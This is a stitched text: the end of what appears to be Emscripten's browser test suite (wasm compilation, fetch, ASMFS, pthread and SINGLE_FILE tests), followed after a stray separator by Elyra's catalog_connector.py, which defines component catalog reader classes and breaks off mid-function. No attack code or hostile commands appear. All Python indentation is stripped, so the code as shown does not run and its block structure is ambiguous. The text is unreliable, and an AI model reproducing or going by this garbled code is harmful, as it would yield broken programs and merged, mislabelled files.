(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="native-wasm,asmjs"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1']).communicate()
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
self.do_test_worker(['-s', 'WASM=1'])
def test_wasm_locate_file(self):
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open('shell2.html', 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.wasm") return "cdn/test.wasm"; else return filename; }, '))
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
subprocess.check_call([PYTHON, EMCC, 'src.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=1', '-o', 'test.html'])
shutil.move('test.wasm', os.path.join('cdn', 'test.wasm'))
self.run_browser('test.html', '', '/report_result?0')
def test_utf8_textdecoder(self):
self.btest('benchmark_utf8.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf8_corpus.txt') + '@/utf8_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF8ToString"]'])
def test_utf16_textdecoder(self):
self.btest('benchmark_utf16.cpp', expected='0', args=['--embed-file', path_from_root('tests/utf16_corpus.txt') + '@/utf16_corpus.txt', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["UTF16ToString","stringToUTF16","lengthBytesUTF16"]'])
def test_webgl_offscreen_canvas_in_pthread(self):
for args in [[], ['-DTEST_CHAINED_WEBGL_CONTEXT_PASSING']]:
self.btest('gl_in_pthread.cpp', expected='1', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
def test_webgl_offscreen_canvas_in_mainthread_after_pthread(self):
for args in [[], ['-DTEST_MAIN_THREAD_EXPLICIT_COMMIT']]:
self.btest('gl_in_mainthread_after_pthread.cpp', expected='0', args=args + ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests the feature that shell html page can preallocate the typed array and place it to Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-DFILE_DOES_NOT_EXIST'])
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/to_memory.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/cached_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0'])
# Tests that response headers get set on emscripten_fetch_t values.
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'WASM=0'])
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
f = open('largefile.txt', 'w')
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
for i in range(1024):
f.write(s)
f.close()
self.btest('fetch/stream_file.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'TOTAL_MEMORY=536870912'])
# Tests emscripten_fetch() usage in synchronous mode when used from the main thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '--proxy-to-worker'])
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), os.path.join(self.get_dir(), 'gears.png'))
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir(os.path.join(self.get_dir(), 'dirrey'))
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'hello_file.txt'))
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl-open/src.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Tests the absolute minimum pthread-enabled application.
def test_hello_thread(self):
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = os.path.join(self.get_dir(), 'src.c')
open(src, 'w').write(self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
Popen([PYTHON, EMCC, 'src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0']).communicate()
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), os.path.join(self.get_dir(), 'hello_thread_with_blob_url.html'))
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='interpret-binary'"]
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
open('test.c', 'w').write(self.with_report_result(src))
# generate a dummy file
open('dummy_file', 'w').write('dummy')
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts).communicate()
open('a.html', 'w').write('''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"], also_proxied=True)
assert os.path.exists('test.html') and not os.path.exists('test.js') and not os.path.exists('test.worker.js')
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = [PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
run_process(args)
open('test.html', 'w').write('''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
Popen([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1', '-s', "BINARYEN_METHOD='native-wasm'"]).communicate()
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
assert os.path.exists('test.js') and not os.path.exists('test.worker.js')
def test_access_file_after_heap_resize(self):
open('test.txt', 'w').write('hello from file')
open('page.c', 'w').write(self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
Popen([PYTHON, EMCC, 'page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html']).communicate()
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
open(self.in_dir('main.cpp'), 'w').write(self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
subprocess.check_output([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.html', '-O3']).communicate()
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write(src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.js', '-O3'] + args).communicate()
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
open('test-subdir.html', 'w').write('''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
open('test.c', 'w').write(self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for args, creation in [
(['-s', 'MODULARIZE=1'], 'Module();'),
(['-s', 'MODULARIZE_INSTANCE=1'], '')
]:
print(args, creation)
# compile the code with the modularize feature and the preload-file option enabled
Popen([PYTHON, EMCC, 'test.c', '-o', 'test.js'] + args).communicate()
open('test.html', 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('test.html', None, '/report_result?0')
|
catalog_connector.py
|
#
# Copyright 2018-2021 Elyra Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import abstractmethod
import hashlib
from http import HTTPStatus
import os
from pathlib import Path
from queue import Empty
from queue import Queue
from threading import Thread
from typing import Any
from typing import Dict
from typing import List
from typing import Optional
from jupyter_core.paths import ENV_JUPYTER_PATH
import requests
from traitlets.config import LoggingConfigurable
from traitlets.traitlets import default
from traitlets.traitlets import Integer
from elyra.metadata.metadata import Metadata
class ComponentCatalogConnector(LoggingConfigurable):
"""
Abstract class to model component_entry readers that can read components from different locations
"""
max_threads_default = 3
max_readers_env = 'ELYRA_CATALOG_CONNECTOR_MAX_READERS'
max_readers = Integer(max_threads_default,
help="""Sets the maximum number of reader threads to be used to read
catalog entries in parallel""").tag(config=True)
@default('max_readers')
def max_readers_default(self):
max_reader_threads = ComponentCatalogConnector.max_threads_default
try:
max_reader_threads = int(os.getenv(self.max_readers_env, max_reader_threads))
except ValueError:
pass
return max_reader_threads
def __init__(self, file_types: List[str], **kwargs):
super().__init__(**kwargs)
self._file_types = file_types
@abstractmethod
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
Each catalog_entry_data dictionary contains the information needed to access a single component
definition. The form that each catalog_entry_data takes is determined by the unique requirements
of the reader class.
For example, the FilesystemCatalogConnector includes both a base directory ('base_dir') key-value
pair and a relative path ('path') key-value pair in its 'catalog_entry_data' dict. Both fields
are needed in order to access the corresponding component definition in read_catalog_entry().
Every catalog_entry_data should contain each of the keys returned in get_hash_keys() to ensure
uniqueness and portability among entries. For the same reason, no two catalog entries should have
equivalent catalog_entry_data dictionaries.
:param catalog_metadata: the dictionary form of the metadata associated with a single catalog;
the general structure is given in the example below
example:
{
"description": "...", # only present if a description is added
"runtime_type": "...", # must be present
"categories": ["category1", "category2", ...], # may be an empty array
"your_property1": value1,
"your_property2": value2,
...
}
:returns: a list of catalog entry dictionaries, each of which contains the information
needed to access a component definition in read_catalog_entry()
"""
raise NotImplementedError(
"abstract method 'get_catalog_entries()' must be implemented"
)
@abstractmethod
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: a dictionary that contains the information needed to read the content
of the component definition; below is an example data structure returned
from get_catalog_entries()
example:
{
"directory_path": "/Users/path/to/directory",
"relative_path": "subdir/file.py"
}
:param catalog_metadata: the metadata associated with the catalog in which this catalog entry is
stored; this is the same dictionary that is passed into get_catalog_entries();
in addition to catalog_entry_data, catalog_metadata may also be
needed to read the component definition for certain types of catalogs
:returns: the content of the given catalog entry's definition in string form, if found, or None;
if None is returned, this catalog entry is skipped and a warning message logged
"""
raise NotImplementedError(
"abstract method 'read_catalog_entry()' must be implemented"
)
@abstractmethod
def get_hash_keys(self) -> List[Any]:
"""
Provides a list of keys, available in the 'catalog_entry_data' dictionary, whose values
will be used to construct a unique hash id for each entry with the given catalog type.
Besides being a means to uniquely identify a single component (catalog entry), the hash id
also enables pipeline portability across installations when the keys returned here are
chosen strategically. For example, the FilesystemCatalogConnector includes both a base
directory key-value pair and a relative path key-value pair in its 'catalog_entry_data' dict.
Both fields are required to access the component definition in read_catalog_entry(), but
only the relative path field is used to create the unique hash. This allows a component
that has the same relative path defined in two separate a catalogs in two separate
installations to resolve to the same unique id in each, and therefore to be portable across
pipelines in these installations.
To ensure the hash is unique, no two catalog entries can have the same key-value pairs
over the set of keys returned by this function. If two entries resolve to the same hash,
the one whose definition is read last will overwrite the other(s).
Example:
Given a set of keys ['key1', 'key2', 'key3'], the below two catalog_entry_data dictionaries
will produce unique hashes. The same can not be said, however, if the set of keys
returned is ['key2', 'key3'].
component_entry_data for entry1: component_entry_data for entry2:
{ {
'key1': 'value1', 'key1': 'value4',
'key2': 'value2', 'key2': 'value2',
'key3': 'value3' 'key3': 'value3'
} {
Additionally, every catalog_entry_data dict should include each key in the set returned
here. If this is not the case, a catalog entry's portability and uniqueness may be negatively
affected.
:returns: a list of keys
"""
raise NotImplementedError(
"abstract method 'get_hash_keys()' must be implemented"
)
def get_unique_component_hash(self,
catalog_type: str,
catalog_entry_data: Dict[str, Any],
catalog_hash_keys: List[Any]) -> str:
"""
Constructs a unique hash for the given component based on the name of the catalog
connector class and any information specific to that component-and-catalog-type
combination as given in catalog_hash_keys.
:param catalog_type: the identifying type of this Connector class, as taken from the
schema_name of the related schema (e.g., url-catalog)
:param catalog_entry_data: the identifying data associated with the catalog entry; this data
structure is one of the dicts returned from get_catalog_entries()
:param catalog_hash_keys: the list of keys (present in the catalog_entry_data dict)
whose values will be used to construct the hash
:returns: a unique component id of the form '<catalog-type>:<hash_of_entry_data>'
"""
hash_str = ""
for key in catalog_hash_keys:
if not catalog_entry_data.get(key):
self.log.warning(f"Catalog entry does not have key '{key}'. Continuing to build hash "
f"string without this key...")
continue
hash_str = hash_str + str(catalog_entry_data[key]) + ":"
hash_str = hash_str[:-1]
# Use only the first 12 characters of the resulting hash
hash_digest = f"{hashlib.sha256(hash_str.encode()).hexdigest()[:12]}"
return f"{catalog_type}:{hash_digest}"
def read_component_definitions(self, catalog_instance: Metadata) -> Dict[str, Dict]:
"""
This function compiles the definitions of all catalog entries in a given catalog.
Catalog entry data is first retrieved for each entry in the given catalog. This data is added
to a queue, and a number of reader threads ('max_reader' or fewer) are started.
Each reader thread pulls the data for a singe catalog entry from the queue and uses it to read
the definition associated with that entry.
As a mutable object, the 'catalog_entry_map' provides a means to retrieve a return value for
each thread. If a thread is able to successfully read the content of the given catalog entry,
a unique hash is created for the entry and a mapping is added to the catalog_entry_map.
The catalog_instance Metadata parameter will have the following attributes of interest in
addition to a few additional attributes used internally:
:param catalog_instance: the Metadata instance for this catalog; below is an example instance
example:
display_name: str = "Catalog Name"
schema_name: str = "connector-type"
metadata: Dict[str, Any] = {
"description": "...", # only present if a description is added
"runtime": "...", # must be present
"categories": ["category1", "category2", ...], # may be an empty array
"your_property1": value1,
"your_property2": value2,
...
}
:returns: a mapping of a unique component ids to their definition and identifying data
"""
catalog_entry_map = {}
catalog_entry_q = Queue()
try:
# Retrieve list of keys that will be used to construct
# the catalog entry hash for each entry in the catalog
keys_to_hash = self.get_hash_keys()
# Add catalog entry data dictionaries to the thread queue
for entry_data in self.get_catalog_entries(catalog_instance.metadata):
catalog_entry_q.put_nowait(entry_data)
except NotImplementedError as e:
err_msg = f"{self.__class__.__name__} does not meet the requirements of a catalog connector class: {e}"
self.log.error(err_msg)
except Exception as e:
err_msg = f"Could not get catalog entry information for catalog '{catalog_instance.display_name}': {e}"
# Dump stack trace with error message
self.log.exception(err_msg)
def read_with_thread():
"""
Gets a catalog entry data dictionary from the queue and attempts to read corresponding definition
"""
while not catalog_entry_q.empty():
try:
# Pull a catalog entry dictionary from the queue
catalog_entry_data = catalog_entry_q.get(timeout=.1)
except Empty:
continue
try:
# Read the entry definition given its returned data and the catalog entry data
self.log.debug(f"Attempting read of definition for catalog entry with identifying information: "
f"{str(catalog_entry_data)}...")
definition = self.read_catalog_entry(catalog_entry_data=catalog_entry_data,
catalog_metadata=catalog_instance.metadata)
# Ignore this entry if no definition content is returned
if not definition:
self.log.warning(f"No definition content found for catalog entry with identifying information: "
f"{str(catalog_entry_data)}. Skipping...")
catalog_entry_q.task_done()
continue
# Generate hash for this catalog entry
catalog_entry_id = self.get_unique_component_hash(catalog_type=catalog_instance.schema_name,
catalog_entry_data=catalog_entry_data,
catalog_hash_keys=keys_to_hash)
# Add entry definition and identifying data to mapping
catalog_entry_map[catalog_entry_id] = {
"definition": definition,
"identifier": catalog_entry_data
}
except NotImplementedError as e:
msg = f"{self.__class__.__name__} does not meet the requirements of a catalog connector class: {e}."
self.log.error(msg)
except Exception as e:
# Dump stack trace with error message and continue
self.log.exception(f"Could not read definition for catalog entry with identifying information: "
f"{str(catalog_entry_data)}: {e}")
# Mark this thread's read as complete
catalog_entry_q.task_done()
# Start 'max_reader' reader threads if catalog includes more than 'max_reader'
# number of catalog entries, else start one thread per entry
num_threads = min(catalog_entry_q.qsize(), self.max_readers)
for i in range(num_threads):
Thread(target=read_with_thread).start()
# Wait for all queued entries to be processed
catalog_entry_q.join()
return catalog_entry_map
class FilesystemComponentCatalogConnector(ComponentCatalogConnector):
"""
Read a singular component definition from the local filesystem
"""
def get_absolute_path(self, path: str) -> str:
"""
Determines the absolute location of a given path. Error checking is delegated to
the calling function
"""
# Expand path to include user home if necessary
path = os.path.expanduser(path)
# Check for absolute path
if os.path.isabs(path):
return path
# If path is still not absolute, default to the Jupyter share location
return os.path.join(ENV_JUPYTER_PATH[0], 'components', path)
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of component_entry_data; for the FilesystemComponentCatalogConnector class this
takes the form:
{
'base_dir': 'base/directory/for/file', # can be empty
'path': 'path/to/definition_in_local_fs.ext' # may be relative or absolute
}
"""
catalog_entry_data = []
base_dir = catalog_metadata.get('base_path', '')
if base_dir:
base_dir = self.get_absolute_path(base_dir)
if not os.path.exists(base_dir):
# If the base directory is not found, skip this catalog
self.log.warning(f"Base directory does not exist -> {base_dir}")
return catalog_entry_data
for path in catalog_metadata.get('paths'):
path = os.path.expanduser(path)
if not base_dir and not os.path.isabs(path):
base_dir = os.path.join(ENV_JUPYTER_PATH[0], 'components')
catalog_entry_data.append({
'base_dir': base_dir,
'path': path
})
return catalog_entry_data
def read_catalog_entry(self,
catalog_entry_data: Dict[str, Any],
catalog_metadata: Dict[str, Any]) -> Optional[str]:
"""
Reads a component definition for a single catalog entry using the catalog_entry_data returned
from get_catalog_entries() and, if needed, the catalog metadata.
:param catalog_entry_data: for the Filesystem- and DirectoryComponentCatalogConnector classes,
this includes 'path' and 'base_dir' keys
:param catalog_metadata: Filesystem- and DirectoryComponentCatalogConnector classes do not need this
field to read individual catalog entries
"""
path = os.path.join(catalog_entry_data.get('base_dir', ''), catalog_entry_data.get('path'))
if not os.path.exists(path):
self.log.warning(f"Invalid location for component: {path}")
else:
with open(path, 'r') as f:
return f.read()
return None
def get_hash_keys(self) -> List[Any]:
"""
For the Filesystem- and DirectoryComponentCatalogConnector classes, only the
'path' value is needed from the catalog_entry_data dictionary to construct a
unique hash id for a single catalog entry
"""
return ['path']
class DirectoryComponentCatalogConnector(FilesystemComponentCatalogConnector):
"""
Read component definitions from a local directory
"""
def get_relative_path_from_base(self, base_dir: str, file_path: str) -> str:
"""
Determines the relative portion of a path from the given base directory.
:param base_dir: the absolute path to a base directory to compare against
:param file_path: the absolute path to a file within the given base directory
:returns: the path to the given file relative to the given base directory
Example:
given: base_path = "/path/to/folder"
given: absolute_path = "/path/to/folder/nested/file.py"
returns: 'nested/file.py'
"""
base_list = base_dir.split('/')
absolute_list = file_path.split('/')
while base_list:
base_list = base_list[1:]
absolute_list = absolute_list[1:]
return '/'.join(absolute_list)
def get_catalog_entries(self, catalog_metadata: Dict[str, Any]) -> List[Dict[str, Any]]:
"""
Returns a list of catalog_entry_data dictionary instances, one per entry in the given catalog.
:returns: a list of component_entry_data; for the DirectoryComponentCatalogConnector class this
takes the form
{
'base_dir': 'base/directory/for/files', # given in base_path
'path': 'path/to/definition_in_local_fs.ext' # may be relative or absolute
}
"""
catalog_entry_data = []
for dir_path in catalog_metadata.get('paths'):
base_dir = self.get_absolute_path(dir_path)
if not os.path.exists(base_dir):
